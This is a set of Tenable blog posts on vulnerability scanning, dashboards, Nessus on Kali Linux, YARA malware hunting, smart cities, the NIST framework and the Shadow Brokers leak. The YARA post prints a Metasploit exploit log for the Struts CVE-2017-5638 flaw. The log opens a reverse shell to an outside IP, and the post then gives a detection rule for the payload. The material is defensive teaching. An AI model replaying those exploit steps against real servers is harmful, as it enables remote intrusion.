The final table on the dashboard, Top Hosts with Java Vulnerabilities, uses a keyword filter for “java” in the Plugin Name to display the top hosts with Java vulnerabilities. These vulnerabilities include outdated versions of Java and the Java Development Kit (JDK), and vulnerabilities in applications that use Java. Because of the filter, concerns with JavaScript will also be included. Since Java is so commonly used on all kinds of devices, Java vulnerabilities can potentially open up huge security holes. These vulnerabilities must be dealt with as soon as possible.

For details on these vulnerabilities, go to the Vulnerabilities Workbench and set the Advanced filter of Plugin Name to contains java (the filter is not case sensitive):

You can use other Plugin Name keywords to detect other types of vulnerabilities. For example, use “adobe” to find vulnerabilities in Adobe products, “unsupported” to find products that are no longer supported, “default”, “malicious process”, and “xss”. These and other plugin name keywords may be appropriate in your environment and can help you prioritize assets to secure. Experiment a bit! There are many possible filters; find the ones that best help your organization discover vulnerabilities that are the highest priority to fix.

Flexible licensing

The Tenable.io Vulnerability Management platform accurately captures vulnerabilities on transient and dynamic assets. Because asset data can change constantly, Tenable’s new Elastic Asset Licensing model employs an advanced algorithm to track changing asset attributes across the network over time. This asset-based model helps you recover licenses for temporary systems and isolated assets that are scanned periodically.

Try Tenable.io

Tenable.io provides accurate information on how well your organization is addressing security risks, and helps track improvements over time. Try Tenable.io Vulnerability Management free for 60 days.

What scans do you use? Tenable customers can assess their security risks from information gathered by vulnerability and compliance scans. In this blog, I’ll show you how to build a customized scan that helps diagnose authentication issues that show up when running those scans. I call it the Quick Credential Debug Scan, or QCD for short.

QCD is popular because of its speed and its light impact on the target. QCD performs key tests required to access the target system. Even though the scan requires credentials, the scan does not probe for vulnerability or compliance information.

The Host Access Capabilities component in the Credentialed Windows Scanning dashboard shows some of the diagnostic results tested by QCD:

The QCD scan is built with tests recommended by Tenable customers and other sources. QCD works with Tenable scanning products: from Tenable.io™ and SecurityCenter® to Nessus® Manager and Professional. The scan contains a customized policy which includes specific tests or “plugins” (referenced by plugin id number in the Building the Scan section below). Note that “scan” and “scan policy” are used synonymously in this blog.

History of the QCD scan policy

When I first started working with Nessus and SecurityCenter, I scanned using vulnerability and compliance scans. Often, when scanning systems for the first time, I had authentication issues. I would make changes and then rerun the vulnerability scan. I did not like the load and the duration of the vulnerability scans; I realized I needed a debug scan, but did not have the time to figure out which plugins to include.

After joining Tenable, I worked with some savvy customers who had built a useful debug scan. I incorporated their selections with a few others in composing the QCD scan policy. QCD helps validate access to Windows and Linux targets. The QCD includes a short list of plugins so the scan runs quickly and with little impact on the target system.

To fix those scan access issues, QCD helps debug in two places: first, with scan credentials; second, with system access settings. Typically I may run QCD many times as I experiment with different settings until the scan runs cleanly.

For example, when my scan returns plugin Authentication Failure - Local Checks Not Run (21745), then I log into the target system’s service account manually. Once I have determined the correct login manually, I update the scan credentials. Then I run QCD to verify that the problem has been solved.

Another example is when I see the Microsoft Windows SMB Registry Not Fully Accessible Detection (10428) plugin, my next step is to turn on the registry service scan option. Then I run QCD to verify that the change solves the problem. Sometimes this process may take several iterations before all the systems are scanning without any issues.

Building the scan

The custom QCD (Advanced) scan policy can be built by selecting a few individual plugins. The QCD scan pulls plugins from three families: General, Settings, and Windows.

These plugins provide the following functions:

• Login checks: 10394, 12634, 21745
• Access checks: 10400, 24269
• Software summary: 20811, 22869
• OS identification: 11936
• Other info: 10150, 10396, 10400, 10919, 12053, 19506, 64582

The QCD scan policy includes the following plugins (plugin id numbers are in parentheses):

• Windows family
  • (10150) Windows NetBIOS / SMB Remote Host Information Disclosure
  • (10394) Microsoft Windows SMB Log In Possible
  • (10396) Microsoft Windows SMB Shares Access
  • (10400) Microsoft Windows SMB Registry Remotely Accessible
  • (20811) Microsoft Windows Installed Software Enumeration (credentialed check)
  • (24269) Windows Management Instrumentation (WMI) Available
• General family
  • (10919) Open Port Re-check
  • (12053) Host Fully Qualified Domain Name (FQDN) Resolution
  • (22869) Software Enumeration (SSH)
  • (11936) OS Identification
  • (64582) Netstat Connection Information
• Settings family
  • (12634) Authenticated Check: OS Name and Installed Package Enumeration
  • (19506) Nessus Scan Information
  • (21745) Authentication Failure - Local Checks Not Run

The following SecurityCenter screenshots illustrate how to create the QCD. SecurityCenter provides a handy search filter which helps locate the plugins.

You can build this scan policy yourself or download the XML file available on the Tenable Community.

Other plugins can be included. Let us know what plugins you have found useful for debugging scan access on community.tenable.com.

Seeing the results

Two dashboard templates are helpful in looking at scan issues and the results from the QCD scans. The Credentialed Windows Scanning and Credentialed Linux Scanning dashboard display many of these plugin results. Remember to refresh the element after running the scan.

The Host Access Capabilities component in the bottom left of the Credentialed Windows Scanning dashboard lays out six of the most common access issues in the Windows environment. The Linux dashboard has similar checks.

Summary

Try the Quick Credential Debug scan to rapidly solve your scan access issues while reducing impact on the target systems. And share your observations with us at the Tenable Community!

Earlier this week, guest speaker Josh Zelonis, Senior Analyst at Forrester, and Michael Applebaum, VP Product Marketing at Tenable spoke at a webinar about some of the big trends in vulnerability management in 2017.

You can access an on-demand recording anytime on our Webinars web page. If you’re wondering what it was all about, here are a few highlights.

Forrester survey results

49% of organizations suffered one or more breaches in the past year

Josh kicked off the talk by sharing a few results from a recent Forrester Global Security Survey. I was surprised by the first result he shared -- that 49% of organizations had suffered one or more breaches in the past year. I know the breaches are common; any Google search for “data breach” will come up with pages of results. A search today, for example, shows that job seekers are one group who had a bad week with breaches reported at the Illinois Department of Employment Security, IdahoWorks, and America's JobLink Alliance (AJLA) affecting millions of job applicants in multiple states. Still, I was surprised that the survey result showed breaches affected almost half of all organizations.

The #1 issue that was pervasive across the attacks was software vulnerabilities or software exploits

Given all the focus and research we do on vulnerability management here at Tenable, less surprising was the detail how those breaches occurred. Of those 49% of organizations that had reported being breached, 56% had experienced one of those breaches as an external attack and the #1 issue that was pervasive across the attacks was software vulnerabilities or software exploits. We know that vulnerability management is a significant challenge for organizations in 2017.

The mix of active scanners, agents and passive listening sensors in Tenable.io are designed to maximize scan coverage

One reason Josh gave for vulnerability management being such a challenge is that organizations have a difficult time knowing what assets are in their environment, especially fluid, or dynamic assets that come and go from the network frequently like cloud services or containers. Tenable research shows that dynamic assets are difficult to track using traditional vulnerability management methods like active scanning alone. If a cloud service or container isn’t on the network when an active scan is taking place, it won’t be included in the results. That’s one reason why Tenable has invested so much in Tenable.io and specifically the Tenable.io Container Security application. The mix of active scanners, agents and passive listening sensors in Tenable.io are designed to maximize scan coverage, while the specific capabilities of Tenable.io Container Security bring security into the container build process.

DevOps and early detection

These dynamic assets though, as Josh put it, can actually be a gift to security. Dynamic assets like containers are often discussed in the context of DevOps. DevOps, as you likely know, is the cooperation between developers and operations professionals (and often QA and security) with a goal to accelerate IT and development processes. DevOps gives organizations the ability to set goals, determine processes, and test for security misconfigurations and vulnerabilities earlier in the development lifecycle. Software flaws can be identified and addressed in the QA environment, which is not only more secure, but also more efficient than fixing flaws in production applications.

Learn more

There’s more good insights from Josh and others in the webinar. I encourage you take a few minutes to enjoy the webinar and also learn more about Tenable.io via any of these resources:

• Vulnerability Management in 2017: Leap Ahead or Fall Behind webinar recording
• Additional sessions of this webinar will be scheduled for EMEA and APAC regions. Watch for your invitation!
• Tenable.io information
• Tenable.io evaluation

Kali Linux, a Linux distribution designed specifically for penetration testing, comes prepackaged with many pen test tools. Nessus® provides a penetration tester with a wealth of capabilities that will assist in the engagement, such as:

• Identifying local and remote vulnerabilities
• Configuration and compliance audits
• Checking for default credentials
• Web application scanning

Because the Kali Linux installation of Nessus has been very popular over the past several years, we decided to update the instructions to help you make the most of your pen testing environment.

Nessus isn’t installed on Kali Linux by default, but this post will show you how to install Nessus and provide some suggestions for using it in a penetration testing engagement to gain a more complete understanding of your organization's security posture.

Installing and configuring Nessus

Prior to downloading Nessus, ensure that your Kali Linux installation is up to date:

apt update && apt upgrade

Step 1: Purchase Nessus and obtain an Activation Code

Nessus can be purchased directly from Tenable or through an authorized reseller.

After purchasing Nessus, an Activation Code will be available on the Tenable Support Portal.

Step 2: Download Nessus

Navigate to the Tenable Nessus downloads page and select the appropriate version for your installation of Kali Linux, either the 32-bit or 64-bit Debian package:

Nessus-6.10.4-debian6_i386.deb Nessus 6.10.4 for Debian 6, 7, 8 / Kali Linux 1, 2016 Rolling - i386

Nessus-6.10.4-debian6_amd64.deb Nessus 6.10.4 for Debian 6, 7, 8 / Kali Linux 1, 2016 Rolling - AMD64

Step 3: Install Nessus

Using the command line, install the Nessus package:

dpkg -i Nessus-6.9.4-debian6_amd64.deb

Once the installation completes, start the Nessus service:

/etc/init.d/nessusd start

If you would like Nessus to start when Kali Linux boots, issue the command:

update-rc.d nessusd enable

After the Nessus service starts, using a web browser to navigate to the Nessus Web Interface at: https://localhost:8834/.

Step 4: Configure and use Nessus

You may see a warning about the SSL certificate not being configured appropriately. You can continue past this warning or consult the Nessus User Guide to properly set this up.

To configure Nessus, follow the installation wizard. Create an administrator user account, activate with your activation code from the Tenable Support Portal, and let Nessus fetch and process the plugins.

Refer to the official Nessus documentation for any other questions or issues with installing Nessus.

Using Nessus in a penetration test

Kali Linux tools complement your Nessus installation, with everything in one place for easy maintenance. Nessus reports on host discovery, vulnerability detection and exploitability. Here are some of the ways that Nessus can be used to support penetration testing:

• Remediation prioritization and newsworthy vulnerabilities
  • Finding Heartbleed, Shellshock or other newsworthy vulnerabilities may be important when assessing an organization’s security posture and reporting to the security leadership team.
• Detecting default credentials
  • Use credentials harvested from other phases of testing to perform credentialed patch audits, local (client-side) application vulnerability scanning, and discovery of interesting configurations on targets.
• Hunting for web shells
  • A web server may already be compromised without the administrator even knowing about it. Nessus can help in the detection of compromised hosts.
• Modify a vulnerability’s severity
  • Identify low-severity vulnerabilities and allow an admin-level user to re-cast them as critical vulnerabilities. Modifying the severity of a vulnerability empowers testers to raise the visibility of lower severity findings that often lead to serious exposures.

Conclusion

Nessus is the world’s most widely-deployed vulnerability assessment solution. Nessus quickly and accurately identifies vulnerabilities, configuration issues and malware in physical, virtual and cloud environments to help you prioritize what to fix first. Combine Nessus with Kali Linux to build a superior pen testing toolkit that provides deep insight into your network systems.

For more information

To download Nessus, visit the Nessus Download page or evaluate Nessus Professional for 7 days.

The same services we use to connect our networks to the vast resources of the internet can be used against us if not properly secured. Many of the most effective exploits leverage vulnerabilities in common web services, making our jobs more difficult because connectivity is synonymous with exposure. Finding the balance between easy access to resources and securing the network against exploitation is a major challenge that every organization faces, but one that Tenable can help overcome. With the Web Services Indicator dashboard in Tenable.io™, the information you need to earn leadership support to strengthen network defenses against web service exploitation is at your fingertips.

Locating the links

The Malicious URL matrix in the Web Services Indicator dashboard counts detections of HTTP and HTTPS that link to malicious content. The matrix leverages the Web Site Links to Malicious Content Nessus plugin (ID 52670) to detect website URLs that link to malicious sources. Since malware is so often distributed via web traffic, you should look into the causes for these detections promptly.

The easiest way to learn more about the hosts with links to malicious content is to apply an Advanced Filter to the Vulnerabilities workbench. Using a filter for plugin ID 52670 will present a list of all hosts on which the plugin detected malicious links:

You can find lots of useful details on the drill-down page for a specific result. This includes the plugin description as well as the assets the activity was detected on. Plugin output, when the result was first seen, reference information, and links to more information may also be included. Often most importantly, solutions for remediating detected vulnerabilities are given.

The cells in the External URL Indicator matrix turn purple when a URL containing the specified Uniform Resource Identifier is discovered during a scan. The matrix uses the External URLs active plugin (ID 49704) to identify over 150 URIs on hosts. Common URIs include http, ftp, and about. URIs are typically the first section of a URL, followed by a colon and two slashes. If you notice results for unexpected URIs, you should investigate the source to ensure that only reliable and authorized external URLs are being accessed. Often, these results will just be links to a company’s additional resources in their support documentation. However, malware regularly contains URLs that are called back or connected to, so keeping an eye on these results is the safest bet.

Spotting the services

The Web Internet Services dashboard matrix provides indicators for the detection of 30 unique web services. The matrix uses the Web Servers plugin family to filter for plugins of particular concern, and the cells turn purple when a specific service or vulnerability is detected. I would recommend monitoring this information closely, since the presence of unexpected or unapproved web services could be indicative of an unauthorized or misconfigured device connecting to the network.

You can use an Advanced filter on the Vulnerabilities workbench to find detailed information about specific results. Applying a plugin family filter for the Web Servers family will display all the results reflected in this matrix. Adding a plugin name filter for keywords related to particular services will help you isolate the hosts causing a single indicator to turn purple.

The SSL Plugins matrix narrows the focus to detections and vulnerabilities related to TLS and SSL. Using filters for plugin ID, CVE ID, and plugin output, the 30 cells change color when specific TLS- or SSL-related vulnerabilities are detected. Since TLS and SSL are so commonly exploited, I like to keep a keen eye on these results. In a single glance I can get an overview of whether these protocols are being used and whether they are vulnerable to exploitation.

Validating the vulnerabilities

The Web Service Vulnerabilities by Port matrix displays the counts of detected vulnerabilities for specific web service ports by severity. The columns break out the counts by severity as well as exploitability to give you a clearer understanding of vulnerability. HTTP/HTTPS, HTTP Management, Proxy, SOAP, and VNC services are specifically identified by port number. You will likely want to prioritize the identification and remediation of hosts that have critical or exploitable vulnerabilities; use Advanced filters to track down hosts that use specific ports and have critical or exploitable vulnerabilities.

The Hosts with Web Service Vulnerabilities by Plugin Family matrix provides counts of plugin results from four different families by severity. The four families included are CGI Abuses, Databases, FTP, and Web Services. The columns display counts for each severity as well as for exploitability. By prioritizing the areas with critical and exploitable vulnerabilities, I can more effectively secure my network against intrusion and infection. Oftentimes simply applying the patches, updates, or upgrades needed to remediate a critical vulnerability will also take care of others.

To track down the most severely impacted hosts, use an Advanced filter for the plugin family, severity, or exploitability. This can help to identify the hosts that are affected by relevant vulnerabilities and give insight into how to respond:

A variety of other Advanced filters can be used to investigate scan results related to web services. For example, adding a filter for CPE, hostname, or vulnerability state can help to focus efforts on securing web services in your environment.

Reducing risk

As you have likely inferred through reading this review of the Web Services Indicator dashboard, the primary goal is the ability to monitor the degree of vulnerability due to web services. Gaining insight into the available links, malicious and benign, enables you to ensure that your users can connect where they need to without exposing your organization to exploitation. The information in this dashboard also enables you to detect outdated configurations that should be targeted for removal or upgrade in order to dramatically reduce the risk of exploitation. With the ability to focus the lens on web service vulnerabilities by port, protocol, or plugin family, you can be ready to demonstrate where the organization’s greatest risk lies. By gathering all this insight, you can be prepared to enlighten your organization’s leadership and garner the support you need to effectively defend your network.

Try Tenable.io

Tenable.io provides accurate information on how well your organization is addressing security risks, and helps track improvements over time. Try Tenable.io Vulnerability Management free for 60 days.

Tenable recently released two new YARA plugins to complement the already existing Windows YARA plugin. The new plugins are YARA Memory Scan (Linux) and YARA File Scan (Linux) (Solaris). The plugins bring YARA functionality to Linux and Solaris hosts. This blog discusses a couple of scenarios in which these plugins are useful.

Memory scanning

There’s been a lot of chatter about the recent Struts 2 remote code execution vulnerability CVE-2017-5638. Much of the excitement is due to the active exploitation of the vulnerability in the wild. In response, we’ve published a blog explaining how to use Nessus to detect the vulnerability.

There are many approaches that should be taken to determine if the vulnerable server pictured above has been exploited. A few existing Nessus plugins can help. For example, the Linux MD5 scanner (plugins 71261 and 91223) and the Linux process reputation plugin (71261). Another approach is to use YARA to scan the system for malicious files or processes. For example, what if the attacker used Metasploit’s new module for CVE-2017-5638 to execute a payload on the server?

msf exploit(struts2_content_type_ognl) > run

[*] Started reverse TCP handler on 52.93.5.12:4444
[*] Sending stage (2849752 bytes) to 128.183.27.101
[*] Meterpreter session 5 opened (52.93.5.12:4444 -> 128.183.27.101:45862) at 2017-03-24 07:40:53 -0400

meterpreter > shell
Process 10727 created.
Channel 1 created.
whoami
albinolobster

File scanning won’t be good enough here because the payload is deleted from disk shortly after gaining execution. You’ll need to scan the system’s running processes. But first you need a YARA rule to describe the payload in memory.

The YaraRules project has a lot of great rules, but I couldn’t find one that described Metasploit’s initial stager or Mettle (the Unix meterpreter). So, I wrote my own rule and added it to Tenable’s open source YARA rules repository. The rule makes the observation that the stager is comprised of a single LOAD segment with the read, write, and execute flags all set:

import "elf"

rule single_load_rwe
{
     meta:
          description = "Flags binaries with a single LOAD segment marked as RWE.
          family = "Stager"
          filetype = "ELF"
          hash = "711a06265c71a7157ef1732c56e02a992e56e9d9383ca0f6d98cd96a30e37299"

     condition:
          elf.number_of_segments == 1 and
          elf.segments[0].type == elf.PT_LOAD and
          elf.segments[0].flags == elf.PF_R | elf.PF_W | elf.PF_X
}

You can then scan all the running processes using the following command (note: there is a bug in YARA 3.5 and below that negatively affects Linux memory scanning. Do not use memory scanning with those versions):

albinolobster@ubuntu:~$ for pid in `ps -ef | awk '{print $2}'` ; do sudo yara ./rule_file.yar $pid 2> /dev/null; done
single_load_rwe 10716
single_load_rwe 10718
albinolobster@ubuntu:~$

From the output, you can see that the rule matched two processes: 10716 and 10718. The processes can be found in ps:

10601 pts/18   Sl+   14:25  |   |   \_ /usr/lib/jvm/java-8-openjdk- …
10716 pts/18   S+     0:20  |   |       \_ /tmp/konL6821804046402511623.exe
29565 pts/18   S+     0:00  |   |       |   \_ /bin/sh -c /bin/sh
29566 pts/18   S+     0:00  |   |       |       \_ /bin/sh
10718 pts/18   S+     0:00  |   |       \_ /tmp/konL6369286348563749691.exe

While this is great, manually running YARA on every server isn’t a scalable solution. Using YARA through Nessus makes scanning en masse much easier. Configuring Nessus to do the scan hasn’t really changed since previous YARA blogs (Threat Hunting with YARA and Nessus and GRIZZLY STEPPE Detection with Security Center). The only difference is that the new plugins require SSH credentials if you aren’t using agents and the memory scanning plugin requires escalated privileges. Below is the output from Nessus running YARA on the same hacked host:

File scanning

In September 2016 the Mirai botnet became infamous for executing the largest ever distributed denial of service (DDoS) at the time on KrebsOnSecurity. Mirai was later used in a DDoS attack on Dyn that caused wide scale outages across the internet.

What’s interesting about Mirai is that it is not technically sophisticated. At the time of the attacks, it spread by logging into IoT devices and routers using default SSH or Telnet credentials. However, no one ever came up with a solution to log into the affected devices and scan them for Mirai. This is largely due to the variety in the IoT and router ecosystems. A given device could be running a variant of Linux or it could be running a proprietary OS. The architecture could be MIPS, PowerPC, ARM, or something else entirely. The CPU could be big-endian or it could be little-endian.

For example, I have a Ubiquiti SOHO router on my LAN. The router has a MIPS (big-endian) processor, runs “Linux AirRouter” as the operating system, and provides much of the shell functionality via BusyBox. There is no easy way to get YARA on this device. There is no package repository. No Python. No compiler. You’d need to compile a MIPS version of YARA elsewhere and copy it onto the box.

However, we’ve done all that work for you in these plugins. Using Nessus, I can run YARA on my Ubiquiti router just by adding it to the targets list. Using Florian Roth’s (@cyb3rops) rule for Mirai I’m able to locate the malware on the device’s filesystem:

Conclusion

Linux, and especially IoT devices, have not traditionally been an easy space to look for malware. With these new plugins, Tenable hopes to give you further insight into your hosts and the ability to hunt malware wherever it may hide.

If you’ve never heard the term “smart city” before, you are soon going to be hearing it a lot. Smart city technology uses data sensors and analytics, the IoT, information and communication technology to improve the efficiency of city services and the quality of our lives. Smart cities monitor and manage physical assets, infrastructure, connectivity, and information services that affect citizens on a daily basis.

The smart city vision

You have probably already experienced a small sample of what smart city technology can do for you. For example, have you ever approached a highway on-ramp that is controlled by a smart traffic light that manages traffic flow, alleviates congestion and reduces idling time? Do you have a smart meter at home that monitors your daily energy consumption and recommends scheduling appliance usage during non-peak hours? Have you used a smartphone app that tells you where the empty parking spaces are in an airport garage? On a very small scale, those are all examples of smart city technology at work.

On a grander scale, imagine a city in which autonomous buses shuttle employees to work via the most efficient route, reducing individual automobile emissions and improving rush hour traffic flow. Or a virtual grid of sensors that relay data to a central processor to determine where air pollution is at critical levels, or where earth tremors are signaling a potential quake, warning the public of an impending emergency. Or Dedicated Short Range Communications (DSRC) devices in cars that eliminate the need for parking meters.

Does that sound like the Jetsons? Think again. This is reality, in places like Singapore, Columbus Ohio, and Barcelona where smart city technology is being deployed. As more people move into cities and urban sprawl increases, integrated services and system efficiencies are critical to our quality of life. Smart city technologists envision community-wide free Wi-Fi, autonomous public transportation, DSRC traffic flow control, smart street lighting, energy efficiencies, data sensors across the city to collect and analyze metrics, and IoT devices in every smart building.

Public/private partnerships

Smart city initiatives are being planned and funded by both government agencies and commercial firms

Smart city initiatives are being planned and funded by both government agencies and commercial firms, with many projects undertaken as public/private partnerships. For example, the U.S. Department of Transportation’s Smart City Challenge is working with Columbus, Ohio (and other finalist municipalities) to implement smart transportation systems that improve traffic flow, reduce transportation costs, and create more efficient systems. The state of Illinois is going after the title of “first smart state” with the 2016 creation of a statewide agency overseeing smart technology across the state, from digitizing public health care services to installing energy efficient street lights.

I recently had the privilege of meeting with Governor Terry McAuliffe of Virginia. As chair of the National Governors Association (NGA), McAuliffe has announced that Meet the Threat is his focus for the NGA this coming year to improve cybersecurity strategies and practices nationwide. He is also working with mayors from four Virginia cities who have submitted proposals to the ongoing DOT Smart City Challenge program. McAuliffe’s initiatives illustrate the reality that cybersecurity is no longer an IT issue – it is a public safety issue, an infrastructure issue, an executive issue that touches all aspects of our lives. Security must be planned for and funded as an integral part of each and every technology initiative.

The technology

Clearly, smart cities are welcome if the technology truly improves our lives. But it can be alarming if our privacy is at further risk. Since these smart city initiatives are just beginning, we have an opportunity and obligation to take the time to make sure that security is an integral part of the overall design. If smart city technology is not secure, we are not only putting our systems at risk, we are risking the safety and lives of the citizenry as well.

In many respects, smart city technology is simply a scaling of our existing technology – an expansion of networks, data repositories, the IoT, and wireless communications. That means bigger networks, expansive cloud-based services, more IoT devices and interconnected devices – infrastructure that moves beyond enterprise walls and permeates all aspects of our lives. That also means more opportunities for adversaries to take advantage of security weaknesses.

Smart technology is not smart enough without security that is completely integrated into the smart devices and applications from the outset. And smart security must scale along with the technology and infrastructure changes.

Smart security at the city level

Take the City of San Diego as an example. As the eighth largest city in the U.S., San Diego operations include 24 networks and 40 departments all running 24/7, from traffic control to library services, from the police department to waste management. With over a million cyberattacks per day, the city’s infrastructure cannot afford anything but the most comprehensive and trustworthy security to prevent potential disruptions and catastrophic losses. With the help of Tenable’s security solutions, the city inventoried all of their systems, deployed active and passive scanning, identified hundreds of at-risk devices to patch or decommission, and implemented continuous security monitoring to protect all assets across the city. City officials estimate that they are saving over one million dollars per year by reducing their threat exposure and strengthening their security against potential breaches. And with the continual development and expansion of Tenable services, security is growing as San Diego enters the smart city era. No asset goes live without a thorough scan and configuration audit.

“Design in” security

Smart technology is not smart enough without security that is completely integrated in from the outset

There is an old adage that says, “plan, plan, plan and then execute.” I urge all politicians, state and local officials, urban planning and development organizations to take a step back, collaborate and design security into the vision of the smart city. The time spent to get it right out of the gate will save taxpayers significant sums in the future by not having to compensate for security issues later with people, technologies and programs when it could have been designed in from the start.

On April 10, the comment period closed for the NIST revised Framework for Improving Critical Infrastructure Cybersecurity (Framework). The current draft includes expanded explanations, refinements and a completely new section: Measuring and Demonstrating Cybersecurity.

Measuring and demonstrating cybersecurity to business leaders and partners is simultaneously very important and very challenging. Various sources, including the EisnerAmper accounting firm and the National Association of Corporate Directors, have reported that only about 20% of boards have confidence in the state of their organization’s cybersecurity. Clearly measuring and demonstrating cybersecurity is important to boards.

The difficult issue is accurately correlating cybersecurity activities and outcomes to desired business objectives

Unfortunately, measuring and demonstrating cybersecurity is not easy. The first issue is measuring cybersecurity posture. This is typically performed by auditing cybersecurity activities and outcomes to determine if controls are implemented correctly, operating as intended and producing the desired outcome. The second — and in my opinion —much more difficult issue is accurately correlating cybersecurity activities and outcomes to desired business objectives.

We could consider many examples of business objectives, but consider the example cited in the draft Framework: a retail bank wanting to increase the number of online banking customers may do so by implementing stronger authentication. The draft Framework readily admits that achieving an increase in online banking customers is also contingent upon:

• Developing messages regarding trusted online transactions
• Targeting specific consumer demographics
• Selecting communication channels that are most meaningful to those demographics
• Marketing through those communication channels over the necessary timeframe to achieve the objective

Correlating cybersecurity with business objectives — a laudable goal

Clearly, it would be difficult to separate the effects of stronger authentication from the above-listed communication factors to calculate the impact on the number of online banking customers. Even if it were possible, communication factors are only one of the variables that would need to be isolated to measure the impact of stronger authentication on online banking customers. Ideally, measuring the impact of stronger authentication would require a controlled experiment that isolates marketing communications, the economy, the competitive environment, sales promotions, training and other factors.

As much as I applaud the Framework’s goal of measuring cybersecurity and correlating it with business objectives, I think it remains a long-term aspiration for most organizations. Most organizations are challenged to measure cybersecurity in a meaningful way.

Measuring cybersecurity remains a significant, but achievable, challenge

Most security organizations struggle to communicate timely security status to business leaders and business partners. Synchronizing volumes of data across multiple sources and abstracting it in a manner that makes sense to business leaders is a difficult challenge. However, it is a challenge that can be addressed today.

Tenable Assurance Reports Cards (ARCs), available through SecurityCenter Continuous View® (SecurityCenter CV), make this task much easier. ARCs bridge the communication gap between security professionals and business executives by visually communicating the status of the most critical security controls in a familiar report card format.

SecurityCenter CV includes multiple ARC templates to measure technical control status across the NIST Cybersecurity Framework’s Identify, Protect and Detect functions. At the highest abstraction level, ARCs present pass/fail status. The screenshot below shows six ARCs – two passing and four failing. You can easily tailor an ARC to scope it to report on a specific business system so you can communicate status to the business owner.

Evaluation of multiple policy tests determines an ARC’s pass/fail status. The rows of small green check marks and red Xs indicate which policy tests have passed and failed, respectively. When all policy tests pass, the overall ARC achieves passing status.

The screenshot below shows the specific policy tests evaluated for the CSF IDENTIFY. Asset Management (ID.AM) ARC. You can add, delete or edit policy tests as needed to assess your environment.

Accurately correlating cybersecurity status to business objective attainment is not a pipe dream, but it will likely remain a stretch goal into the foreseeable future. However, you can start communicating security status based on the NIST Cybersecurity Framework today. ARCs deliver security status in a format that your organization’s business leaders and partners can understand.

Measuring state and trends over time, internally, through external audit, and through conformity assessment, enables an organization to understand and convey meaningful risk information to dependents, partners, and customers.   [NIST CSF 1.1]

For more information

Learn more about how Tenable SecurityCenter Continuous View supports the NIST Cybersecurity Framework.

Last week the hacker group known as Shadow Brokers published on the internet a large cache of weaponized software exploits and hacking tools targeting numerous vendor products. This fifth release appears to be the largest and most damaging to date, featuring several previously unknown exploits in widely used enterprise IT products and details on alleged U.S. capabilities to access and monitor SWIFT banking transactions. The sheer size of this leak made this weekend a challenging one for CISOs all over the world as they rushed to make sure that they weren’t vulnerable to these new exploits before attackers started using them.

The good news is that there appears to be a patch available for just about everything in the package. In some cases — such as the exploits for Windows XP and Windows Server 2003 — there will never be any patch since support for those products has long since been discontinued. Any CISOs who still have these older systems on their networks are now vulnerable to attack and will be defenseless targets to anyone who is able to get a foothold on those networks.

Many of the patches for the exploits provided by the Shadow Brokers have only just recently been released, meaning that many organizations may have not had time to run those patches through their patch management processes and get them applied to their critical systems. Of course, just because a patch is available doesn’t automatically mean your organization is safe. The pervasiveness and severity of some of the vulnerabilities in this drop makes it critical that you’re able to properly prioritize and patch every affected system in your environment.

In some cases, those patches may never be applied, whether due to a conscious decision to preserve the operational status of a crucial system, or possibly due to imperfect knowledge about what’s on the network and the impact of these blind spots on overall security. A look at historical patch MS08-67 is an excellent example. This critical vulnerability from 2008 is one that lived for years within organizations. This is the first thing that penetration testers would look for when compromising a network. MS08-67 has now been replaced by MS17-10. While there is a patch available, there will always be one machine that someone overlooked that a penetration tester or an attacker will find and use to compromise your network.

This is why conducting a proper system inventory is of such high importance to any commercial organization or government agency. You can’t protect what you don’t know. You can’t patch it either.

The Tenable research team spent the weekend reviewing the files released by the Shadow Brokers. Here are the highlights:

• Microsoft patched vulnerabilities in all supported versions of Microsoft software.
• Unsupported software such as IIS 5/6, Windows XP, Windows 2000/XP/Vista/2003, Exchange 2007 are vulnerable and should be upgraded to supported versions.
• Disable SMBv1. Microsoft and CERT have long recommended disabling SMBv1 where possible.
• A toolkit is already being leveraged to push Cobalt Strike, Metasploit, PoisonIvy, Empire and other payloads that are available as DLLs using DLL injection.

Tenable coverage and solutions

We have developed a SecurityCenter® dashboard tailored to identify hosts that may be susceptible to the vulnerabilities and exploits published by the Shadow Brokers hacking group. The Shadow Broker Vulnerability Detection dashboard is available through the SecurityCenter Feed to provide insight into the vulnerability of your network and the progress made toward upgrading outdated hosts.

The Tenable Research Team has many plugins already available to address these vulnerabilities. We are also actively developing new plugins specific to this package. Here are the relevant solutions; we will continue to update this post as more plugins become available.

Many thanks to the Tenable research team for their contributions to this blog.

As part of the vulnerability management team I am often asked, “Just how exposed are we to the vulnerabilities in this report?” Thinking about the question, I like to first understand the relationship between vulnerability and exploitability. Next, I want to understand the likelihood a vulnerability can be exploited. From these two steps, I can begin to communicate the exploitability of our assets to management and data owners. Tenable.io helps you better understand the question “How Exploitable are You” by the data presented in the Exploitable by Malware dashboard.

Vulnerabilities

In computer security, a vulnerability is a weakness that enables a malicious or unsuspecting user to gain access to privileged or unauthorized information. In the simplest form, a misconfiguration of file level permissions can grant unauthorized users access to a file, folder, application, or service that is unauthorized. In a more complex example, chunks of uninitialized memory may be mixed with valid data as discovered in Cloudflare services. Regardless of how simple or complex the vulnerability, the question quickly becomes can the vulnerability be exploited?

Exploits

An exploit is a piece of software, string of data, or series of commands that can be used to cause some unintended or unanticipated behavior of a computer system. The development of code used to exploit systems can be very difficult to develop in some cases and in others very simple.

Frameworks

Several well known security researchers decided that to truly test and understand the nature of exploiting a vulnerability, a framework was needed. A framework is an abstraction in which the foundation of the software provides the generic functionality, and users can write code modules to perform specific tasks. In this case, the developers of Metasploit, Core Impact and several others created a framework to leverage common attack techniques and delivery methods, while the users of the framework create the actual exploits. These frameworks can be used by inexperienced attackers to create an attack that may look much more sophisticated, because most of the hard work has been created by the framework. Once you understand how to leverage the framework to exploit a buffer overflow, replicating the attack can seem trivial. As the frameworks become more popular, the industry is seeing a rise in malware code that may have been developed using different frameworks.

The Tenable.io solution

Tenable.io can easily identify systems that are more exploitable than other systems Tenable.io™ can easily identify systems that are more exploitable than other systems. There are several exploitability-related search fields, along with several fields that are related to common exploit frameworks. When using the Workbench, you can select the Advanced link and then add filters :

